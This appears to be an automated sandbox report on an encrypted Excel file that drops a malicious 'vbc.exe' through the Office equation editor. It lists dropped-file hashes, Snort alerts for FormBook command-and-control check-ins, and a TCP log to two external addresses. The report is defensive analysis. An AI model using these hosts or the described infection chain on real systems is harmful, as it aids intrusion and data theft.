                                                                                                                                                                                          Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A339838D.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):51166
Entropy (8bit):7.767050944061069
Encrypted:false
SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:false
Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9F87218.emf
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):648132
Entropy (8bit):2.8124530118203914
Encrypted:false
SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
SHA1:F677467423105ACF39B76CB366F08152527052B3
SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
Malicious:false
Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBDD36B.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):51166
Entropy (8bit):7.767050944061069
Encrypted:false
SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:false
Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA391AAF.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):84203
Entropy (8bit):7.979766688932294
Encrypted:false
SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:208FD40D2F72D9AED77A86A44782E9E2
SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:false
Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll
Process:C:\Users\Public\vbc.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11776
Entropy (8bit):5.855045165595541
Encrypted:false
SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious
• Filename: New Order PO2193570O1.pdf.exe, Detection: malicious
• Filename: 2320900000000.exe, Detection: malicious
• Filename: CshpH9OSkc.exe, Detection: malicious
• Filename: 5SXTKXCnqS.exe, Detection: malicious
• Filename: i6xFULh8J5.exe, Detection: malicious
• Filename: AWB00028487364 -000487449287.doc, Detection: malicious
• Filename: 090049000009000.exe, Detection: malicious
• Filename: dYy3yfSkwY.exe, Detection: malicious
• Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious
• Filename: Purchase Order Price List 061021.xlsx, Detection: malicious
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
• Filename: UGGJ4NnzFz.exe, Detection: malicious
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
• Filename: 3arZKnr21W.exe, Detection: malicious
• Filename: Shipping receipt.exe, Detection: malicious
• Filename: New Order TL273723734533.pdf.exe, Detection: malicious
• Filename: YZ8OvkljWm.exe, Detection: malicious
• Filename: U03c2doc.exe, Detection: malicious
• Filename: QUOTE061021.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsw45F7.tmp
                                                                                                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                          File Type:data
Category:dropped
Size (bytes):261012
Entropy (8bit):7.3456635705707685
Encrypted:false
SSDEEP:6144:9ob3S8T7kC7sf3eG3Jw24DKBGNLtqEZpG+x6t:iz7kC7sf3t3EFtpDGma
MD5:AF69C1313ADD571627D87D2453F87D28
SHA1:97818C9D2B9E8794F97D27CF0EBC2A763639F5E0
SHA-256:6AFC732265B4C7257FF86EEE7AA8AD9E25DA0E0BA996CE425BDFF07EBF2B4349
SHA-512:8C9E2FC2BADD92D495FAB633AC537842665F59B90D04CF2AAA8BDDBD06D25CEA631153C842F08C29AFE83129583D82CD48EFCD7DAA4CCAE3662A02563ED3ABC0
Malicious:false
C:\Users\user\AppData\Local\Temp\x8abgzdx2taarfhvmdw
Process:C:\Users\Public\vbc.exe
File Type:data
Category:dropped
Size (bytes):164352
Entropy (8bit):7.998740117796754
Encrypted:true
SSDEEP:3072:WI3SWiaT7vg17lM7sf37lghuFa47Zrw24HAsFUyzyBGNmqDv:93S8T7kC7sf3eG3Jw24DKBGNLz
MD5:D6A1573FFB40613104C0755D78241AB4
SHA1:8567FBE29F2DE39618F8FC5EEAFB18F5C6B9D4AD
SHA-256:B3132DA42852DD7F3C7BD9044AF9FB0916F9B8C6C6854B572F2CA6424CF2FECD
SHA-512:6042A74B4572B2D04182EE3B8E6BF0D5518B4C752C887FB8AB770A5B8D385B5E58500EA4DE980227E577DABE9DD01B457F700ECECDA107180646DB8ADCE80981
Malicious:false
C:\Users\user\AppData\Local\Temp\yerrxvolv
Process:C:\Users\Public\vbc.exe
File Type:data
Category:dropped
Size (bytes):56945
Entropy (8bit):4.916897762190798
Encrypted:false
SSDEEP:1536:5HwlaCciRuhiRUidh5HAYBe16mKqrk5US/zf6Up:NacPUXHl06pG+US/OO
MD5:83D3E22048178472A2287533D5C2FE99
SHA1:CA6E1F360EF458E914968D27963E2E821B281080
SHA-256:98B4220FF7F5974B33154C161C82A814078FE0D670726F0C62CBCB17F9A0A8FE
SHA-512:7151EEF108AFDCB5B7794718128973A4941197ED572AF9F20E68CB5637CC8DF2A17555765E45C101787EE7EB2D662C54E74EA5229890C90DB2C11CC24D1198F2
Malicious:false
C:\Users\user\Desktop\~$L2.xlsx
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Preview: .user ..A.l.b.u.s. (Excel owner lock file; the user name repeats twice, padded with spaces)
C:\Users\Public\vbc.exe
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):224710
Entropy (8bit):7.912728398567341
Encrypted:false
SSDEEP:6144:Ds9p+npLadPGnTF8SnI8ey8uLSJB6+i940vqC7J:yptdenTiSnI8ethi9aaJ
MD5:8C35AC8D43F7E59105902FA16114144E
SHA1:C1A0E5DE1121E55C22649182C923B41EFD4E2848
SHA-256:1A08FC838C4EBAB6B986B6010E2074A05C29916CD38096E7F7D26A6455917508
SHA-512:F89DA0804389F71E3627B9BCC5299D6EAAB0649197D1084FB3B6F63E4BD126BAF333C9781AA02C3666AC59E79CB645487CFDBE19061B1C5119098529BFBD7F18
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 23%
• Antivirus: ReversingLabs, Detection: 41%

Static File Info

General

File type:CDFV2 Encrypted
Entropy (8bit):7.995578935184159
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:L2.xlsx
File size:1308600
MD5:e5aaa3f2879244a0b44b27ce151e0c29
SHA1:eb0608507f6aa9432f276ab6fcaeddc7439bf169
SHA256:d9aa9baf5698eebd324bf2d501d72a62ce6973eeb42a7dce961d0e65baaad67f
SHA512:378f161ed695cc96c7b1bc11d2e4745090beee7b65802e848890d82e097d046bf59bfec99c3483aeae9d75e75716fa3f4649cc80e2872952e8d58daa2061f329
SSDEEP:24576:8aqT3NL8qo597tcvl4LXOETHVhwfhV2PpqTOwyc/cxzHbk/u:Y2z97t/THVO/2huyfx38u

File Icon

Icon Hash:e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "L2.xlsx"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:True
Contains Word Document Stream:False
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
General
Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:data
Stream Size:64
Entropy:2.73637206947
Base64 Encoded:False
Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
General
Stream Path:\x6DataSpaces/DataSpaceMap
File Type:data
Stream Size:112
Entropy:2.7597816111
Base64 Encoded:False
Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
General
Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:data
Stream Size:208
Entropy:3.35153409046
Base64 Encoded:False
Data ASCII:l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
                                                                                                                                                                                          Data Raw:6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:76
                                                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 1294776
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:1294776
                                                                                                                                                                                          Entropy:7.99983620552
                                                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                                                          Data ASCII:. . . . . . . . ! . . . . . m . . < . . . . ' . . . ~ 2 > > . { . . . l . > . . . . . . . 6 . . [ n . . . . . . . ] . . . . . } Q . . . j . . . o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 .
                                                                                                                                                                                          Data Raw:ac c1 13 00 00 00 00 00 21 9c 18 96 98 ba 6d 87 c0 3c cb ea 07 9d 27 e9 82 bd 7e 32 3e 3e 14 7b f1 b3 f4 6c 09 3e 1a bb a7 ae 1f e0 19 36 aa a2 5b 6e 17 bf 81 99 96 ad 91 5d d7 f4 f1 9f a9 7d 51 de f9 a8 6a ce 80 96 6f 85 60 2a 5a 2f 31 0a 69 78 25 b6 94 2b 64 3f 6f 85 60 2a 5a 2f 31 0a 69 78 25 b6 94 2b 64 3f 6f 85 60 2a 5a 2f 31 0a 69 78 25 b6 94 2b 64 3f 6f 85 60 2a 5a 2f 31 0a
                                                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:224
                                                                                                                                                                                          Entropy:4.61330272016
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . e . Q . . . m 8 . Q o . . . N . . . . . . N ; . . . k i . . . . . . . . . L . . d . . 2 . . . . . . , . p E . I . . . . 9 . . m .
                                                                                                                                                                                          Data Raw:03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 e0 a3 0f 03 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                              Source Port  Dest Port  Source IP     Dest IP
06/11/21-08:06:48.269107  TCP       2022550  ET TROJAN Possible Malicious Macro DL EXE Feb 2016  49165        80         192.168.2.22  192.210.173.40
06/11/21-08:08:17.470238  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)                49167        80         192.168.2.22  45.195.169.197
06/11/21-08:08:17.470238  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)                49167        80         192.168.2.22  45.195.169.197
06/11/21-08:08:17.470238  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)                49167        80         192.168.2.22  45.195.169.197

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Jun 11, 2021 08:06:48.070724964 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:48.268426895 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.268569946 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:48.269107103 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:48.467674017 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.467708111 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.467727900 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.467746973 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.467828035 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:48.467958927 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:48.665436029 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.665472984 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.665488958 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.665503025 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.665518045 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.665532112 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.665550947 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.665566921 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.666445017 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:48.866069078 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866101027 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866115093 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866130114 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866147995 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866163969 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866182089 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866197109 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866214037 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866235971 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866259098 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866277933 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:48.866306067 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:48.866334915 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:48.869468927 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071228027 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071257114 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071274042 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071290016 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071299076 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071307898 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071325064 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071330070 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071331024 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071336985 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071351051 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071367979 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071377039 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071384907 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071396112 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071403027 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071410894 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071422100 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071439028 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071455002 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071455002 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071460962 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071464062 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071475029 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071479082 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071494102 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071496010 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071511030 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071513891 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071528912 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071532011 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071547985 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071548939 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071563959 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071568966 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071580887 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071583033 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.071604013 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.071616888 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.074109077 CEST  49165        80         192.168.2.22    192.210.173.40
